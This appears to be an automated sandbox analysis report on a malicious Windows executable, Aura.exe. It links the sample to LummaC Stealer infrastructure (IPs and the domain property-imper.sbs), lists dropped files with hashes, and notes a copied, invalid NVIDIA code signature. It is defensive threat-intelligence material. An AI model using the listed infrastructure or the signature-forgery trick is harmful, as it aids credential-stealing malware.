    Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
    Number of analysed new started processes analysed: 10
    Number of new started drivers analysed: 0
    Number of existing processes analysed: 0
    Number of existing drivers analysed: 0
    Number of injected processes analysed: 0
    Technologies:
    • HCA enabled
    • EGA enabled
    • AMSI enabled
    Analysis Mode: default
    Analysis stop reason: Timeout
    Sample name: Aura.exe
    Detection: MAL
    Classification: mal100.evad.winEXE@6/12@1/1
    EGA Information:
    • Successful, ratio: 100%
    HCA Information:
    • Successful, ratio: 90%
    • Number of executed functions: 17
    • Number of non-executed functions: 43
    Cookbook Comments:
    • Found application associated with file extension: .exe
    • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, svchost.exe
    • Excluded IPs from analysis (whitelisted): 172.202.163.200, 52.165.164.15, 20.42.65.92, 4.245.163.56
    • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, glb.cws.prod.dcat.dsp.trafficmanager.net, blobcollector.events.data.trafficmanager.net, sls.update.microsoft.com, umwatson.events.data.microsoft.com, glb.sls.prod.dcat.dsp.trafficmanager.net
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size getting too big, too many NtCreateKey calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • VT rate limit hit for: Aura.exe
Time | Type | Description
08:17:48 | API Interceptor | 2x Sleep call for process: aspnet_regiis.exe modified
08:18:04 | API Interceptor | 2x Sleep call for process: SIHClient.exe modified
08:18:17 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
Match: 104.21.33.116
Associated Sample Name / URL | Detection | Threat Name
injector V2.4.exe | malicious | LummaC Stealer
file.exe | malicious | LummaC Stealer
file.exe | malicious | Amadey, Clipboard Hijacker, Credential Flusher, Cryptbot, LummaC Stealer, Stealc
file.exe | malicious | Unknown
file.exe | malicious | Unknown
file.exe | malicious | LummaC Stealer
file.exe | malicious | Unknown
Script.exe | malicious | LummaC Stealer
file.exe | malicious | LummaC Stealer
file.exe | malicious | PureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar
Match: property-imper.sbs
Associated Sample Name / URL | Detection | Threat Name | Context
injector V2.4.exe | malicious | LummaC Stealer | 104.21.33.116
loader.exe | malicious | LummaC Stealer | 172.67.162.84
file.exe | malicious | LummaC Stealer | 104.21.33.116
file.exe | malicious | Amadey, Clipboard Hijacker, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | 104.21.33.116
file.exe | malicious | Unknown | 104.21.33.116
file.exe | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | 172.67.162.84
file.exe | malicious | LummaC Stealer | 172.67.162.84
file.exe | malicious | Unknown | 104.21.33.116
Loader.exe | malicious | LummaC Stealer | 172.67.162.84
file.exe | malicious | LummaC Stealer | 104.21.33.116
Match: CLOUDFLARENETUS
Associated Sample Name / URL | Detection | Threat Name | Context
injector V2.5.exe | malicious | LummaC Stealer | 104.21.88.250
injector V2.4.exe | malicious | LummaC Stealer | 104.21.44.93
injector V2.4.exe | malicious | LummaC Stealer | 104.21.33.116
loader.exe | malicious | LummaC Stealer | 172.67.162.84
file.exe | malicious | LummaC Stealer | 104.21.33.116
file.exe | malicious | Amadey, Clipboard Hijacker, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | 104.21.33.116
psol.txt.ps1 | malicious | LummaC | 172.66.0.235
SystemCoreHelper.dll | malicious | LummaC Stealer | 104.21.88.250
file.exe | malicious | Unknown | 104.21.33.116
Setup.exe | malicious | LummaC | 104.21.67.179
Match: a0e9f5d64349fb13191bc781f81f42e1
Associated Sample Name / URL | Detection | Threat Name | Context
injector V2.5.exe | malicious | LummaC Stealer | 104.21.33.116
injector V2.4.exe | malicious | LummaC Stealer | 104.21.33.116
injector V2.4.exe | malicious | LummaC Stealer | 104.21.33.116
loader.exe | malicious | LummaC Stealer | 104.21.33.116
file.exe | malicious | LummaC Stealer | 104.21.33.116
file.exe | malicious | Amadey, Clipboard Hijacker, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | 104.21.33.116
psol.txt.ps1 | malicious | LummaC | 104.21.33.116
SystemCoreHelper.dll | malicious | LummaC Stealer | 104.21.33.116
file.exe | malicious | Unknown | 104.21.33.116
Setup.exe | malicious | LummaC | 104.21.33.116
                                              No context
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 0.9814578593741706
Encrypted: false
SSDEEP: 96:ntgFTBPXVjHvwUMldvxmoijCQXIDcQvc6QcEVcw3cE/n+BHUHZ0ownOgHkEwH3d7:+39jQkd0BU/KaGtizuiF7Z24IO8C
MD5: F842CCB8F6595FC319E1A9F62D2622B0
SHA1: AC85CCBEBD0A90DCC75D23E5C0262C23068733B7
SHA-256: 5B8CAEA70BF04ED9B803C14B76C7C039A641359712C084FF6E475142D872EC3E
SHA-512: F406747E9D6A79D57B38BFEF73CE24DB79969F673F080C115093152D839401AC6A94E064BA8A0A831FF27E56CED66AEAD19535419405C475E49E8DD7940A57B5
Malicious: true
Reputation: low
                                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.6.8.4.1.4.6.5.5.6.6.0.7.4.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.6.8.4.1.4.6.6.9.0.9.8.2.8.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.6.9.1.5.2.0.0.-.1.f.3.b.-.4.d.4.c.-.8.3.2.8.-.9.7.b.9.c.f.8.2.a.6.7.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.5.b.d.6.c.9.4.-.b.2.5.8.-.4.0.9.1.-.9.5.0.2.-.b.b.2.e.b.c.4.d.b.0.7.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.A.u.r.a...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.Q.u.i.n.n.A.v.a.K.a.i.t.l.y.n...t.S.y.S.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.b.1.4.-.0.0.0.1.-.0.0.1.4.-.2.1.e.b.-.f.1.1.4.a.a.3.d.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.e.f.4.d.e.a.f.3.9.4.d.f.0.5.a.5.3.d.8.7.a.1.8.8.a.e.2.5.3.3.6.0.0.0.0.0.0.0.0.!.0.0.0.0.2.9.4.d.9.0.8.5.6.2.3.7.2.6.3.9.1.1.9.f.f.5.f.c.7.e.0.e.4.c.8.b.5.2.
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Mini DuMP crash report, 15 streams, Sat Nov 23 13:17:46 2024, 0x1205a4 type
Category: dropped
Size (bytes): 198480
Entropy (8bit): 3.3202316704502453
Encrypted: false
SSDEEP: 1536:vnTFzTefNyCLpN4uE2aO0ZdLTgvIIgXQMNxPZKVCDHGWw8X0aTL:vnTF4y84uEqALTgvAt8AA8X7T
MD5: 416DB9EAC1C80D8266BBC02331E6F001
SHA1: 40C77D34877C015155C22F3AD83A25199CD8B800
SHA-256: 65ED1E6A7A2F2B7339B8E5C195D8C17516918F841AD305615935D60F7CB97F1D
SHA-512: F238B015AB5C34DC0DDCFA756842DFA1DAB878DC29CF5896CEE0246FAA48706B9262609E0E3C0F0D78050BB9CF8DD9B96DA8DB488CD613846E27C9EE22FB0B69
Malicious: false
Reputation: low
                                              Preview:MDMP..a..... .........Ag............D...............X.......$................J..........`.......8...........T...........00.. ...........,............ ..............................................................................eJ....... ......GenuineIntel............T.............Ag.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 8398
Entropy (8bit): 3.704072032362569
Encrypted: false
SSDEEP: 192:R6l7wVeJ5L65x6YEIISU9jUZZyfgmfZUYaprB89bZZsfwzm:R6lXJF6/6YEXSU9IXigmfWYRZyfp
MD5: 6A0A608C672EBA0A0C995501CA6D4973
SHA1: 57881BEDA3528D825C132AD904ABA9D6A80CD1A3
SHA-256: 7DA6558AB5B57294C701230CD9030360D5C22229341DFA20E9D17B1A3506EDD3
SHA-512: 2ECA0DD3037216FE0750D6621C785B0D9A36D335D33C4F891CDADCCE81558A4A8FBC9937D4D7BE7E87E88504D11EA2AAD5C4F50C3D05252C65B48398C7576236
Malicious: false
Reputation: low
                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.8.3.6.<./.P.i.
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: XML 1.0 document, ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 4753
Entropy (8bit): 4.506260091381083
Encrypted: false
SSDEEP: 48:cvIwWl8zsJJg77aI94rWpW8VYgYm8M4JzU2FBu+q8vOUt3yNxuQJd:uIjfbI7ia7VsJzAKOO3tQJd
MD5: 56F4BE32D3C4D0F96EE262845F4D5ED9
SHA1: 82AA4E9EEE61E882F2F379BB1F5C84770A2A11EA
SHA-256: EF2FEB5C8637703A2B149DBAD1BE31EFCEF5B473E622DFE629C6EAAD97143277
SHA-512: 399C0C64D2FD1261BB0004AE82AAE191F851FD7D1863DED79DB7E6F7AC096FC90785D78A0DA659073FC049A325B6FEDC0CB2826F2397EB5BE8ED677549182741
Malicious: false
Reputation: low
                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="600740" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
Process: C:\Users\user\Desktop\Aura.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 464384
Entropy (8bit): 7.111104441914894
Encrypted: false
SSDEEP: 12288:+qUsJ6bge8fEbpbQ9DyMLHTyzzCAKzGtwkkffltwsnxa43qo97oU9u16GA8Ai2N2:+4J6Ee8fEbpbQ9DyMLHTyzzCAKzGtwkR
MD5: EE85BDD66F4D21A73B522E93399FB2BC
SHA1: BFA09EBA3ADD78D6F35DF6B521C1590EBC6FEF40
SHA-256: 400AAA1B80813F928DCBD67EA3BB5939B9338DD336BA3E73EAEFC48CCECA06F7
SHA-512: 05518C5FF2A1AAA4E16D167171B8A8EF0E9D48A5760890AA3F7C782549AEBC125EC5F2638B6F783C1FFA2E2F65237580082E627CA3FEDB98563878E152A0486E
Malicious: true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation: low
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......]6...W...W...W...<...W...<..W...<...W...<...W..>....W...W..{W..K"...W..K"...W..K"...W...W...W..."...W..."...W..Rich.W..........PE..L..../Ag...........!.........t...............................................@............@.............................|.......P............................ ..D...\...............................x...@...............T............................text............................... ..`.rdata...\.......^..................@..@.data........ ......................@....reloc..D.... ......................@..B................................................................................................................................................................................................................................................................................................................................................
Process: C:\Windows\System32\SIHClient.exe
File Type: data
Category: dropped
Size (bytes): 12288
Entropy (8bit): 3.1827158197423437
Encrypted: false
SSDEEP: 192:Fo099jgiVuXkNPNBFeaC5Oj7bT36ECat2/x:FPjgiVuXkNFBFeL5Oj7X36ECat2/x
MD5: 8B62E72B286BD8AA41144C706E9D3C4D
SHA1: F65C6B6AEB35E618714492A5D77F9E56CDC1BFD4
SHA-256: 7673E39637E39031E2415D854BC2A11655D664ED6CF6105238A34689EFE20986
SHA-512: 4F99F218F6EF913D185AE5776B9FB9AD62FE83D1F89EEB913403F4209152E36970D6630912FEDB1EA2B089EE34F89301364858527BEA38D32E08798AB3FD38B5
Malicious: false
Reputation: low
                                              Preview:....P...P.......................................P...!...........................`........T......................eJ.........8.=..Zb....... ......................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1............................................................W..............'Z...=..........S.I.H._.t.r.a.c.e._.l.o.g...C.:.\.W.i.n.d.o.w.s.\.L.o.g.s.\.S.I.H.\.S.I.H...2.0.2.4.1.1.2.3...0.8.1.8.0.1...0.7.6...1...e.t.l.......P.P.`........T......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Windows\System32\SIHClient.exe
File Type: Microsoft Cabinet archive data, single, 462 bytes, 1 file, at 0x44 +Utf "environment.xml", flags 0x4, ID 31944, number 1, extra bytes 20 in head, 1 datablock, 0x1 compression
Category: dropped
Size (bytes): 17126
Entropy (8bit): 7.3117215578334935
Encrypted: false
SSDEEP: 192:D5X8WyNHDHFzqDHt8AxL5TKG+tJSdqnajapCNjFZYECUqY7oX9qhnJSdqnaja2Sl:qDlsHq4ThPdlmY9CUiqOdlm2W
MD5: 1B6460EE0273E97C251F7A67F49ACDB4
SHA1: 4A3FDFBB1865C3DAED996BDB5C634AA5164ABBB8
SHA-256: 3158032BAC1A6D278CCC2B7D91E2FBC9F01BEABF9C75D500A7F161E69F2C5F4A
SHA-512: 3D256D8AC917C6733BAB7CC4537A17D37810EFD690BCA0FA361CF44583476121C9BCCCD9C53994AE05E9F9DFF94FFAD1BB30C0F7AFF6DF68F73411703E3DF88A
Malicious: false
                                              Preview:MSCF............D................|...............A..........d.......................environment.xml.....b...CK..ao.0...J...&.q...-..;+.6+-i.......7.....=....g.P.RQ.#..#...QQ..p.kk..qX..)...T.....zL#<.4......\k..f..,.Q...`..K7.hP..".E.53.V.DW.X).z.=`.COO 8..8.......!$.P!`00....E.m..l .)".J.vC..J..&...5.5(.a..!..MIM...*......z.;......t.<.o..|CR.3>..n.;8dX....:....N.....U.......J.I(vT..3...N....$.._^.A<....&=._(N....m.u.1}.....Ax.b8....q~.i..0.A...*.H........A.0.@....1.0...`.H.e......0....+.....7......0..0V..+.....7....H.......$f.....`..41200..+.....7...1". ...,..gK.........(...._`Oa..;%.010...`.H.e....... K...,.%@.b./.a...Q.:..E.7....V~....0...0..........3....!.G~&.9......0...*.H........0~1.0...U....US1.0...U....Washington1.0...U....Redmond1.0...U....Microsoft Corporation1(0&..U....Microsoft Update Signing CA 2.20...190502214449Z..200502214449Z0o1.0...U....US1.0...U....Washington1.0...U....Redmond1.0...U....Microsoft Corporation1.0...U....Microsoft Update0.."0...*
Process: C:\Windows\System32\SIHClient.exe
File Type: Microsoft Cabinet archive data, single, 7826 bytes, 1 file, at 0x44 +Utf "environment.cab", flags 0x4, ID 53283, number 1, extra bytes 20 in head, 1 datablock, 0x1 compression
Category: dropped
Size (bytes): 24490
Entropy (8bit): 7.629144636744632
Encrypted: false
SSDEEP: 384:iarwQcY8StpA7IQ6GCq30XPSIleI7lzCuqvfiSIleIx:iartHA7PCFP66Tqvfi6c
MD5: ACD24F781C0C8F48A0BD86A0E9F2A154
SHA1: 93B2F4FBF96D15BE0766181AFACDB9FD9DD1B323
SHA-256: 5C0A296B3574D170D69C90B092611646FE8991B8D103D412499DBE7BFDCCCC49
SHA-512: 7B1D821CF1210947344FCF0F9C4927B42271669015DEA1C179B2BEAD9025941138C139C22C068CBD7219B853C80FA01A04E26790D8D76A38FB8BEBE20E0A2A4A
Malicious: false
                                              Preview:MSCF............D...............#................A..........d........B..............environment.cab.x.\&..BCK.\.T...N.....;LB.JW.. .w!....$*...U....."........ (.. E..........w...e.Jf.3gN.{...{V.M4.!.....hn. p(... .a...f..f..j.....Kh5..l.DB\}.=.0.>..X.....z..,'..LC/>....h.>.>.........,~mVI.....'EGD]^..\{....Q....f...4.F.....q..FF.1~...Q,.."g.qq.......}.....g%Zz.;m.9..z../2Jl.p8wGO......-V....FM......y*.....Hy.xy......N.r;.@uV........Xa...b].`..F...y.Wd.e.8.[Z.s7].....=B.$...'.|.-.sC....a_(..$..i.C.T.F}...]...m.R,y.1...'..j3.....ir..B..)sR.G.*..`-=.w....m..2y.....*o...\{..C.4.:ZM..wL-$.I.x:?.!.....:..W.%&.....J.%.....~....E..T.d.Q{..p..J..pY...P../.."rp....`...#w.....'.|n%Dy,.....i....."..x.....b._..\_.^.XOo..*:.&a.`..qA.?.@..t.R/...X3.nF.&........1Z.r.S...9x........?..aP..A...f..k:..\....L...t....Q...1..A..33A1.t..)...c....;......$.$..>._....A.!g`..t...b.H.L..&.....!......v~.n...uE.x...."5.h.4..B.R.d.4.%--.`.B..."..[....l......x(..5......@.zr....
Process: C:\Windows\System32\SIHClient.exe
File Type: Microsoft Cabinet archive data, single, 858 bytes, 1 file, at 0x44 +Utf "environment.xml", flags 0x4, ID 12183, number 1, extra bytes 20 in head, 1 datablock, 0x1 compression
Category: dropped
Size (bytes): 19826
Entropy (8bit): 7.454351722487538
Encrypted: false
SSDEEP: 384:3j+naF6zsHqnltHNsAR9zCfsOCUPTNbZR9zOzD8K:z1F6JLts89zIdrFT9zwoK
MD5: 455385A0D5098033A4C17F7B85593E6A
SHA1: E94CC93C84E9A3A99CAD3C2BD01BFD8829A3BCD6
SHA-256: 2798430E34DF443265228B6F510FC0CFAC333100194289ED0488D1D62C5367A7
SHA-512: 104FA2DAD10520D46EB537786868515683752665757824068383DC4B9C03121B79D9F519D8842878DB02C9630D1DFE2BBC6E4D7B08AFC820E813C250B735621A
Malicious: false
                                              Preview:MSCF....Z.......D................/..........Z....J..........d.......................environment.xml........CK....8.....w..=.9%T`.eu:.jn.E.8......m_.o?...5.K.{.3X3....^.{i..b......{.+.....y:..KW;;\..n.K=.]k..{.=..3......D$.&IQH.$-..8.r.{..HP.........g....^..~......e.f2^..N.`.B..o.t....z..3..[#..{S.m..w....<M...j..6.k.K.....~.SP.mx..;N.5..~\.[.!gP...9r@"82"%.B%..<2.c....vO..hB.Fi....{...;.}..f|..g.7..6..].7B..O..#d..]Ls.k..Le...2.*..&I.Q.,....0.\.-.#..L%.Z.G..K.tU.n...J..TM....4....~...:..2.X..p.d....&.Bj.P(.."..).s.d....W.=n8...n...rr..O._.yu...R..$....[...=H"K<.`.e...d.1.3.gk....M..<R......%1BX.[......X.....q......:...3..w....QN7. .qF..A......Q.p...*G...JtL...8sr.s.eQ.zD.u...s.....tjj.G.....Fo...f`Bb<.]k..e.b..,.....*.1.:-....K.......M..;....(,.W.V(^_.....9.,`|...9...>..R...2|.|5.r....n.y>wwU..5...0.J...*.H........J.0.I....1.0...`.H.e......0....+.....7......0..0V..+.....7....H.......$f.....`..41200..+.....7...1". ...>^..~a..e.D.V.C...
Process: C:\Windows\System32\SIHClient.exe
File Type: Microsoft Cabinet archive data, single, 11149 bytes, 1 file, at 0x44 +Utf "environment.cab", flags 0x4, ID 18779, number 1, extra bytes 20 in head, 1 datablock, 0x1 compression
Category: dropped
Size (bytes): 30005
Entropy (8bit): 7.7369400192915085
Encrypted: false
SSDEEP: 768:ouCAyCeQ8fkZdfTGo/its89z8gjP69zA4:Aqf56z8HzT
MD5: 4D7FE667BCB647FE9F2DA6FC8B95BDAE
SHA1: B4B20C75C9AC2AD00D131E387BCB839F6FAAABCA
SHA-256: BE273EA75322249FBF58C9CAD3C8DA5A70811837EF9064733E4F5FF1969D4078
SHA-512: DDB8569A5A5F9AD3CCB990B0A723B64CEE4D49FA6515A8E5C029C1B9E2801F59259A0FC401E27372C133952E4C4840521419EF75895260FA22DFF91E0BE09C02
Malicious: false
                                              Preview:MSCF.....+......D...............[I...........+...I..........d.......rM..............environment.cab...Q.!+rMCK.|.XT....CI7.....AR..$..C$D....RA:....T..........o...g...>.....s....z...>..<...J.R.A......%}..... 0............\...e.z...@..{..,./.:9:X8.s^q...>.(]...I)....'..v@....!.(.i.n.!.g.8\/.+X3.E.~.pi...Q...B...."Oj..~.:....M....uB.}..v.WR........tDD......D7..j..`..5..E.2.z..C....4.s....r..Y.:.|.mtg...S..b._.....!.~Kn..E.=...x.N..e.)....xz...p..h.;..xR'...U.}........nK.+.Y........p..r _.;?.m}$..*%&...8. 7..T....,7..F...e...kI.y...q....".W.W..[..gZQ.....W.$k.T"...N.*...5.R...,+...u.~VO...R-......H7..9........].K....]....tS~*.LSi....T....3+........k......i.J.y...,.Y|.N.t.LX.....zu..8......S*7..{y.m.....Ob.....^.S8Kn.i.._.c~.x.ce.A...t........S.......i1......V..S]H....$..J....E..j...4...o.$..).....;.n<.b.}.(.J.]...Q..u,.-.Bm.[z.j..-i.."...._v.......N..+...g..v..../...;G.Yw....0..u...z....J..K.E..s&..u.h3.]J.G............Z....=.N.X..
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: MS Windows registry file, NT/2000 or above
Category: dropped
Size (bytes): 1835008
Entropy (8bit): 4.4219355515615115
Encrypted: false
SSDEEP: 6144:5Svfpi6ceLP/9skLmb0OTfWSPHaJG8nAgeMZMMhA2fX4WABlEnNs0uhiTwN:wvloTfW+EZMM6DFya03wN
MD5: 143AB3B0A4B9445FB74C2916186C6C2D
SHA1: A9CA8A4E5E32100A9BD62671BE40CDAC8267D13F
SHA-256: 7FA8F23B289D3A2389E1629543B815CD8919BFD8A66DAA98EEE77DC68403FF91
SHA-512: 37A46F81C4EBC6CB377C5B7292FF4B9351B49B1E2295739D4F48DDC5E2587D47D380A329A49EA73A8650511500BB3A9D39DBCD44A9B399F7EB5902A39A124AEB
Malicious: false
                                              Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm....=.................................................................................................................................................................................................................................................................................................................................................!........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Users\user\Desktop\Aura.exe
                                              File Type:ASCII text, with very long lines (351), with CRLF, LF line terminators
                                              Category:dropped
                                              Size (bytes):1412
                                              Entropy (8bit):4.544151385757137
                                              Encrypted:false
                                              SSDEEP:24:7v74NutaMvXIUn2p/kpgw4r22Drrb2nknlusDp:7T4vMff2p8p14nrPKktp
                                              MD5:4E78335F1D364EDBD85752D807DF8D45
                                              SHA1:E764A8C4B616549527E6A4F0C0CE48E407D28D8C
                                              SHA-256:E4349B87BC125DFEE3F89EF2C00483ACE049BF15798C8A7271A8E9B1D13B552F
                                              SHA-512:90A9E6914757DEEE1AA154EC09D65D00FAE926D1BCBD0EE6D3D6AA270778FAA51085553160F282DC4E327EA1AB403F075A1555E3ED2BDE0B02D66AA4F9F9377A
                                              Malicious:false
                                              Preview:.Unhandled Exception: System.Resources.MissingManifestResourceException: Could not find any resources appropriate for the specified culture or the neutral culture. Make sure "caspol.resources" was correctly embedded or linked into assembly "QuinnAvaKaitlyn" at compile time, or that all the satellite assemblies required are loadable and fully signed... at System.Resources.ManifestBasedResourceGroveler.HandleResourceStreamMissing(String fileName).. at System.Resources.ManifestBasedResourceGroveler.GrovelForResourceSet(CultureInfo culture, Dictionary`2 localResourceSets, Boolean tryParents, Boolean createIfNotExists, StackCrawlMark& stackMark).. at System.Resources.ResourceManager.InternalGetResourceSet(CultureInfo requestedCulture, Boolean createIfNotExists, Boolean tryParents, StackCrawlMark& stackMark).. at System.Resources.ResourceManager.InternalGetResourceSet(CultureInfo culture, Boolean createIfNotExists, Boolean tryParents).. at System.Resources.ResourceManager.GetStrin
                                              File type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Entropy (8bit):7.768201752910843
                                              TrID:
                                              • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                              • Win32 Executable (generic) a (10002005/4) 49.96%
                                              • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                              • DOS Executable Generic (2002/1) 0.01%
                                              File name:Aura.exe
                                              File size:728'104 bytes
                                              MD5:137e48d526e2a840e07d309edffaca30
                                              SHA1:294d908562372639119ff5fc7e0e4c8b528bd3f7
                                              SHA256:18344d1186a130b07d7f6da7fd4164ae5e03863873df9872bdd4151abef46df3
                                              SHA512:1d3be4e140809b126022dc09a2e5e65edbd323a0a9b65c89a030038efd08862141fa8a0cc4cd3025a25453cea26ca515d62c934613fa7401b5c251165c9c0edf
                                              SSDEEP:12288:fqmauhQcfY+QL+YaiFTobErR4OgjH28v3moOSF+NhAYU15gwMalxBy2YbfsCtd5Z:5arcfYtL+YakTrrR4V728veSF+N2Gt
                                              TLSH:75F48DDC726072DFD867D472DEA86CA8EA50787B971F4203902706AD9E4D887CF191F2
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..../Ag..............0..............`... ... ....@.. ....................................@................................
                                              Icon Hash:00928e8e8686b000
Entrypoint:0x4b600a
Entrypoint Section:(nameless section at RVA 0xb6000; the entry point RVA 0xb600a lies inside it, just after the 8-byte IAT at 0xb6000)
                                              Digitally signed:true
                                              Imagebase:0x400000
                                              Subsystem:windows cui
                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                              Time Stamp:0x67412FAE [Sat Nov 23 01:28:14 2024 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                              Signature Valid:false
                                              Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
Signature Validation Error:The digital signature of the object did not verify
Error Number:-2146869232 (HRESULT 0x80096010, TRUST_E_BAD_DIGEST: the Authenticode hash of this file does not match the hash carried inside the embedded PKCS#7 signature. This is what a signature block copied from a legitimately signed NVIDIA binary and appended to a different file looks like; the certificate details below describe that copied signature, not a signature issued for these bytes.)
Not Before:12/01/2023 19:00:00
Not After:16/01/2026 18:59:59
                                              Subject Chain
                                              • CN=NVIDIA Corporation, OU=2-J, O=NVIDIA Corporation, L=Santa Clara, S=California, C=US
                                              Version:3
                                              Thumbprint MD5:5F1B6B6C408DB2B4D60BAA489E9A0E5A
                                              Thumbprint SHA-1:15F760D82C79D22446CC7D4806540BF632B1E104
                                              Thumbprint SHA-256:28AF76241322F210DA473D9569EFF6F27124C4CA9F43933DA547E8D068B0A95D
